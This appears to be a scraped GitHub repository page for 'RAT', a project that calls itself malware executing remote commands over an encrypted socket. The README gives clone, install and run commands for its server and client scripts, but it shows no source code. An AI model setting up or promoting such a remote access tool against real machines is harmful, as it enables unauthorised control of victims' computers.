Skip to content

Latest commit

 

History

25 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

RAT

Malware that executes remote commands via an encrypted socket

poc

Installation

git clone https://github.com/epg1213/rat
cd rat
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Run (server - side)

python server.py SERVER_IP_ADDRESS

Run (client - side)

python client.py SERVER_IP_ADDRESS

About

malware that executes remote commands via an encrypted socket

Resources

Stars

1 star

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages